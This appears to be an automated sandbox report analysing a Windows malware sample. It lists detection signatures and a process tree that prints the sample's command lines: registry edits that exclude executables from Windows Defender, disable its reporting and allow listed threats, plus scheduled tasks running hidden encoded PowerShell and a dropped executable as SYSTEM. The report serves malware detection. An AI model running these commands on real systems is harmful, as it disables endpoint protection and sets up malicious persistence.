Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Schedule system process
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5932 cmdline:
C:\Users\u ser\Deskto p\file.exe MD5: E99E15A440798E20C682EB859B3F7885) - Install.exe (PID: 4760 cmdline:
.\Install. exe MD5: 65D01849A2062434BCE6C580CDA92A1D) - Install.exe (PID: 5620 cmdline:
.\Install. exe /S /si te_id "525 403" MD5: 893793FBD70BA4A92919D09205D6C9C1) - forfiles.exe (PID: 4732 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions \" /f /v \ "exe\" /t REG_SZ /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Exclusions \Extension s\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 3096 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Exclusio ns\Extensi ons" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 1544 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 6180 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - forfiles.exe (PID: 5064 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet\" /f /v \"SpyN etReportin g\" /t REG _DWORD /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Spynet\" / f /v \"Spy NetReporti ng\" /t RE G_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 1248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 6152 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Spynet" /f /v "Spy NetReporti ng" /t REG _DWORD /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 6172 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 6208 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - schtasks.exe (PID: 6236 cmdline:
schtasks / CREATE /TN "gAhELFxg t" /SC onc e /ST 12:4 3:49 /F /R U "user" / TR "powers hell -Wind owStyle Hi dden -Enco dedCommand cwB0AGEAc gB0AC0AcAB yAG8AYwBlA HMAcwAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4AI ABnAHAAdQB wAGQAYQB0A GUALgBlAHg AZQAgAC8AZ gBvAHIAYwB lAA==" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 6276 cmdline:
schtasks / run /I /tn "gAhELFxg t" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 6332 cmdline:
schtasks / DELETE /F /TN "gAhEL Fxgt" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6360 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 6488 cmdline:
schtasks / CREATE /TN "bbsSMGQQ DZvgelOgpL " /SC once /ST 19:05 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\VXA fcxyYiTQKM OERw\efplS HrLkKviaSK \pJKKXsE.e xe\" DC /s ite_id 525 403 /S" /V 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6316 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE -W indowStyle Hidden -E ncodedComm and cwB0AG EAcgB0AC0A cAByAG8AYw BlAHMAcwAg AC0AVwBpAG 4AZABvAHcA UwB0AHkAbA BlACAASABp AGQAZABlAG 4AIABnAHAA dQBwAGQAYQ B0AGUALgBl AHgAZQAgAC 8AZgBvAHIA YwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - gpupdate.exe (PID: 6752 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 47C68FE26B0188CDD80F744F7405FF26) - conhost.exe (PID: 6764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- pJKKXsE.exe (PID: 6576 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\VXAfcxy YiTQKMOERw \efplSHrLk KviaSK\pJK KXsE.exe D C /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1) - powershell.exe (PID: 6604 cmdline:
powershell "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 25451\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "225451\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"256596\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"25659 6\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"242 872\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 42872\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214774937 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7749373\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147807 942\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147807942\ " /t REG_S Z /d 6 /re g:64;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 35735\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773573 5\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737010\" /t REG_SZ /d 6 /reg: 32;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147737 010\" /t R EG_SZ /d 6 /reg:64;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147737007\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 37007\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773750 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737503\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol